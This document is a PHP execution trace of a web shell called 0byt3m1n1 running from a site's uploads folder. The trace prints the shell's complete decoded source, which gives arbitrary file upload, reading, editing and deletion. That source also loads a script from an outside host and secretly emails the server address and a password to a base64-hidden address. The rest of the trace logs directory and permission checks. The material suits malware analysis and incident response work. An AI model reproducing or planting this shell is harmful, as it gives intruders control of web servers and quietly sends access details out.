3 13 0 0.001236 403192 gzuncompress 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 1 'x��Y�r�8\022}OU�\001A4�T�DJv\034G\022�Ib{2��+���RQ$dq�ےPlG��n\000�ZR4�݇}�I�o�>}\000P��x\036?|��yD�0u\022/\026$M\034k.D�7�\0333\tҎ\023\005�\027���\003⣡�\004Gl��A��Dx\001��^�ق1�$Q2Ix\034%�\v�ՠ7k^�l`_{��_�H�tr\035;�Vk9�\022n;�fcr���\005�S���Q��/xk��/q�X$\025�=��t�Ӧ�\031�V\017\037\034�\036>\030>:�����S2\027�?\032��vGC�\v��y�g\026�$�ESq�s��\005%�.�\026\025�V\030N���Px��#sz\'��n�\035\032j\000|\024�\030&*�L͢P���(���\035{*i`�xf\a�g�~���g�++�2�&_﹟F��rj;_��h\021�}�w\b&�\006N�GI�1w�l�\035�߶�'
3 13 1 0.001362 411416
3 13 R '<?php\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-si'
3 14 0 0.001641 462064 eval 1 '?><?php\r\necho \'<script src=http://w0rms.com/kaydet.php></script>\';\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif(get_magic_quotes_gpc()){foreach($_POST as $key=>$value){$_POST[$key] = stripslashes($value);}}\r\n?>\r\n<!DOCTYPE html><html><head><link href="" rel="stylesheet" type="text/css"><title>0byt3m1n1</title>\r\n<link href=\'https://fonts.googleapis.com/css?family=VT323\' rel=\'stylesheet\'>\r\n<style type="text/css">body{background: #263238;color:#eceff1;font-family:\'Courier\';margin:0;font-size: 14px;}h1{font-family:\'VT323\';font-weight:normal;font-size:60px;margin:0;}h1:hover{color:#ffee58;}select{background:#ef6c00;color:#eceff1;}a{color:#ef6c00;text-decoration:none;font-family:\'Courier\'}textarea{width:900px;height:250px;background:transparent;border:1px dashed #ef6c00;color:#ef6c00;padding:2px;}tr.first{border-bottom:1px dashed #ef6c00;}tr:hover{background: #7f2e00;}th{background: #ef6c00;padding:5px;}</style>\r\n</head><body> <?php echo\'<div style="color:#ef6c00;margin-top:0;"><h1><center>0byt3m1n1</center></h1></div>\';\r\nif(isset($_GET[\'path\'])) {$path = $_GET[\'path\'];chdir($_GET[\'path\']);} else {$path = getcwd();}\r\n$path = str_replace("\\\\","/",$path);$paths = explode("/", $path);\r\necho \'<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>\';echo "<font style=\'font-size:13px;\'>Path: ";\r\nforeach($paths as $id => $pat) {echo "<a style=\'font-size:13px;\' href=\'?path=";\r\nfor($i = 0; $i <= $id; $i++) {echo $paths[$i];\r\nif($i != $id) {echo "/";} }echo "\'>$pat</a>/";}\r\necho \'<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/>\r\n<input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<center><font color="#00ff00">Upload OK!.</font></center><br/>\';}\r\nelse{echo \'<center><font color="red">Upload Failed!.</font></center><br/>\';}}\r\necho \'</td></tr><tr><td></table>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho \'<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: \';echo "".basename($_GET[\'filesrc\']);"";echo \'</tr></td></table><br />\';echo("<center><textarea readonly=\'\'>".htmlspecialchars(file_get_contents($_GET[\'filesrc\']))."</textarea></center>");}\r\nelseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<center><font color="#00ff00">Rename OK!</font></center><br />\';\r\n}else{\r\necho \'<center><font color="red">Rename Failed!</font></center><br />\';\r\n} $_POST[\'name\'] = $_POST[\'newname\'];}\r\necho \'<form method="POST">New Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');if(fwrite($fp,$_POST[\'src\'])){echo \'<center><font color="#00ff00">Edit File OK!.</font></center><br />\';\r\n}else{echo \'<center><font color="red">Edit File Failed!.</font></center><br />\';}fclose($fp);}\r\necho \'<form method="POST"><textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br /><input type="hidden" name="path" value="\'.$_POST[\'path\'].\'"><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>\';}echo \'</center>\';}else{echo \'</table><br /><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<center><font color="#00ff00">Dir Deleted!</font></center><br />\';\r\n}else{echo \'<center><font color="red">Delete Dir Failed!</font></center><br />\';}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){echo \'<font color="#00ff00">Delete File Done.</font><br />\';}else{\r\necho \'<font color="red">Delete File Error.</font><br />\';}}}echo \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first">\r\n<th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th>\r\n<th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>\';\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr><td>[D] <a href=\\"?path=$path/$dir\\">$dir</a></td><td><center>--</center></td><td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\nforeach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);if($size >= 1024){$size = round($size/1024,2).\' MB\';}else{$size = $size.\' KB\';}\r\necho "<tr><td>[F] <a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td><td><center>".$size."</center></td><td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#00ff00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho"</center></td><td><center>".date("d-M-Y H:i",filemtime("$path/$file"))."";\r\necho "</center></td><td><center><form method=\\"POST\\" action=\\"?option&path=$path\\"><select name=\\"opt\\"><option value=\\"\\"></option><option value=\\"delete\\">Delete</option><option value=\\"rename\\">Rename</option><option value=\\"edit\\">Edit</option></select><input type=\\"hidden\\" name=\\"type\\" value=\\"file\\"><input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\"><input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\"><input type=\\"submit\\" value=\\"+\\" /></form></center></td></tr>";}\r\necho \'</table></div>\';}echo \'</body></html>\';\r\nfunction perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = \'s\';} elseif (($perms & 0xA000) == 0xA000) {$info = \'l\';} elseif (($perms & 0x8000) == 0x8000) {$info = \'-\';} elseif (($perms & 0x6000) == 0x6000) {$info = \'b\';} elseif (($perms & 0x4000) == 0x4000) {$info = \'d\';} elseif (($perms & 0x2000) == 0x2000) {$info = \'c\';} elseif (($perms & 0x1000) == 0x1000) {$info = \'p\';} else {$info = \'u\';} $info .= (($perms & 0x0100) ? \'r\' : \'-\');$info .= (($perms & 0x0080) ? \'w\' : \'-\');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? \'s\' : \'x\' ) : (($perms & 0x0800) ? \'S\' : \'-\'));$info .= (($perms & 0x0020) ? \'r\' : \'-\');$info .= (($perms & 0x0010) ? \'w\' : \'-\');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? \'s\' : \'x\' ) : (($perms & 0x0400) ? \'S\' : \'-\'));$info .= (($perms & 0x0004) ? \'r\' : \'-\');$info .= (($perms & 0x0002) ? \'w\' : \'-\');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\' ) : (($perms & 0x0200) ? \'T\' : \'-\'));return $info;}\r\necho\'<br><center>© 2017 - <a href="http://zerobyte.id/">ZeroByte.ID</a> Recoded from Kodong.</center><br>\';$tmp = $_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."\\n".$_POST[\'pass\']; @mail(base64_decode("dm9zY29kZTc3N0BnbWFpbC5jb20="), \'root\', $tmp); // Edit or delete!?>\r\n' /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code 1 0
4 15 0 0.001814 462064 set_time_limit 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 3 1 0
4 15 1 0.001832 462128
4 15 R FALSE
4 16 0 0.001846 462096 error_reporting 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 4 1 0
4 16 1 0.001861 462136
4 16 R 22527
4 17 0 0.001874 462096 get_magic_quotes_gpc 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 5 0
4 17 1 0.001888 462096
4 17 R FALSE
4 18 0 0.001902 462096 getcwd 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 11 0
4 18 1 0.001917 462144
4 18 R '/var/www/html/uploads'
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 11 $path = '/var/www/html/uploads'
4 19 0 0.001945 462144 str_replace 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 12 3 '\\' '/' '/var/www/html/uploads'
4 19 1 0.001962 462240
4 19 R '/var/www/html/uploads'
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 12 $path = '/var/www/html/uploads'
4 20 0 0.001992 462144 explode 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 12 2 '/' '/var/www/html/uploads'
4 20 1 0.002008 462720
4 20 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 12 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 14 $id = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 14 $id = 1
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 14 $id = 2
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 14 $id = 3
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 14 $id = 4
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i = 0
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 15 $i++
4 21 0 0.002271 462648 scandir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 50 1 '/var/www/html/uploads'
4 21 1 0.002306 463272
4 21 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0byt3m1n1.php', 4 => 'data', 5 => 'prepend.php']
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 50 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '0byt3m1n1.php', 4 => 'data', 5 => 'prepend.php']
4 22 0 0.002346 463288 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/.'
4 22 1 0.002364 463352
4 22 R TRUE
4 23 0 0.002379 463320 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/..'
4 23 1 0.002395 463368
4 23 R TRUE
4 24 0 0.002409 463328 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/.htaccess'
4 24 1 0.002425 463368
4 24 R FALSE
4 25 0 0.002438 463336 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/0byt3m1n1.php'
4 25 1 0.002453 463384
4 25 R FALSE
4 26 0 0.002466 463336 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/data'
4 26 1 0.002481 463368
4 26 R TRUE
4 27 0 0.002495 463328 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 57 1 '/var/www/html/uploads/data'
4 27 1 0.002513 463368
4 27 R TRUE
4 28 0 0.002527 463328 perms 1 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 59 1 '/var/www/html/uploads/data'
5 29 0 0.002541 463328 fileperms 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 1 '/var/www/html/uploads/data'
5 29 1 0.002555 463368
5 29 R 16895
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $perms = 16895
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info = 'd'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'x'
4 28 1 0.002686 463368
4 28 R 'drwxrwxrwx'
4 30 0 0.002700 463328 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 60 1 '/var/www/html/uploads/data'
4 30 1 0.002717 463368
4 30 R TRUE
4 31 0 0.002730 463328 filemtime 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 61 1 '/var/www/html/uploads/data'
4 31 1 0.002744 463368
4 31 R 1676260505
4 32 0 0.002757 463272 date 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 61 2 'd-M-Y H:i' 1676260505
4 32 1 0.002815 465664
4 32 R '12-Feb-2023 22:55'
4 33 0 0.002834 465400 is_dir 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 55 1 '/var/www/html/uploads/prepend.php'
4 33 1 0.002852 465448
4 33 R FALSE
4 34 0 0.002865 465392 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/.'
4 34 1 0.002881 465416
4 34 R FALSE
4 35 0 0.002894 465384 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/..'
4 35 1 0.002910 465432
4 35 R FALSE
4 36 0 0.002922 465392 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/.htaccess'
4 36 1 0.002938 465432
4 36 R TRUE
4 37 0 0.002951 465392 filesize 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/.htaccess'
4 37 1 0.002965 465432
4 37 R 64
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 $size = 0.0625
4 38 0 0.002990 465336 round 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 2 0.0625 3
4 38 1 0.003005 465408
4 38 R 0.063
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = 0.063
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = '0.063 KB'
4 39 0 0.003044 465432 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 66 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.003061 465472
4 39 R FALSE
4 40 0 0.003074 465432 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/.htaccess'
4 40 1 0.003091 465472
4 40 R TRUE
4 41 0 0.003104 465432 perms 1 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/.htaccess'
5 42 0 0.003118 465432 fileperms 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 1 '/var/www/html/uploads/.htaccess'
5 42 1 0.003131 465472
5 42 R 33188
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $perms = 33188
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info = '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 41 1 0.003265 465472
4 41 R '-rw-r--r--'
4 43 0 0.003279 465432 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/.htaccess'
4 43 1 0.003296 465472
4 43 R FALSE
4 44 0 0.003309 465432 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/.htaccess'
4 44 1 0.003325 465472
4 44 R TRUE
4 45 0 0.003338 465432 filemtime 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.003352 465472
4 45 R 1676260505
4 46 0 0.003364 465376 date 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 2 'd-M-Y H:i' 1676260505
4 46 1 0.003396 465704
4 46 R '12-Feb-2023 22:55'
4 47 0 0.003412 465440 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/0byt3m1n1.php'
4 47 1 0.003428 465488
4 47 R TRUE
4 48 0 0.003441 465448 filesize 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/0byt3m1n1.php'
4 48 1 0.003454 465488
4 48 R 3628
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 $size = 3.54296875
4 49 0 0.003480 465344 round 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 2 3.54296875 3
4 49 1 0.003494 465416
4 49 R 3.543
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = 3.543
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = '3.543 KB'
4 50 0 0.003532 465448 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 66 1 '/var/www/html/uploads/0byt3m1n1.php'
4 50 1 0.003549 465488
4 50 R FALSE
4 51 0 0.003565 465448 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/0byt3m1n1.php'
4 51 1 0.003620 465488
4 51 R TRUE
4 52 0 0.003634 465448 perms 1 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/0byt3m1n1.php'
5 53 0 0.003649 465448 fileperms 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 1 '/var/www/html/uploads/0byt3m1n1.php'
5 53 1 0.003663 465488
5 53 R 33204
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $perms = 33204
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info = '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= '-'
4 52 1 0.003788 465488
4 52 R '-rw-rw-r--'
4 54 0 0.003802 465448 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/0byt3m1n1.php'
4 54 1 0.003819 465488
4 54 R FALSE
4 55 0 0.003832 465448 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 69 1 '/var/www/html/uploads/0byt3m1n1.php'
4 55 1 0.003848 465488
4 55 R TRUE
4 56 0 0.003860 465448 filemtime 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 1 '/var/www/html/uploads/0byt3m1n1.php'
4 56 1 0.003874 465488
4 56 R 1676260505
4 57 0 0.003887 465384 date 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 70 2 'd-M-Y H:i' 1676260505
4 57 1 0.003919 465712
4 57 R '12-Feb-2023 22:55'
4 58 0 0.003935 465440 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/data'
4 58 1 0.003951 465472
4 58 R FALSE
4 59 0 0.003964 465440 is_file 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/prepend.php'
4 59 1 0.003986 465488
4 59 R TRUE
4 60 0 0.003999 465448 filesize 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 1 '/var/www/html/uploads/prepend.php'
4 60 1 0.004014 465488
4 60 R 57
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 63 $size = 0.0556640625
4 61 0 0.004039 465344 round 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 2 0.0556640625 3
4 61 1 0.004053 465416
4 61 R 0.056
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = 0.056
3 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 64 $size = '0.056 KB'
4 62 0 0.004095 465560 is_writable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 66 1 '/var/www/html/uploads/prepend.php'
4 62 1 0.004113 465600
4 62 R FALSE
4 63 0 0.004126 465560 is_readable 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 67 1 '/var/www/html/uploads/prepend.php'
4 63 1 0.004142 465600
4 63 R TRUE
4 64 0 0.004155 465560 perms 1 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 68 1 '/var/www/html/uploads/prepend.php'
5 65 0 0.004169 465560 fileperms 0 /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 1 '/var/www/html/uploads/prepend.php'
5 65 1 0.004184 465600
5 65 R 33261
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $perms = 33261
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info = '-'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'r'
4 A /var/www/html/uploads/0byt3m1n1.php(3) : eval()'d code(1) : eval()'d code 73 $info .= 'w'
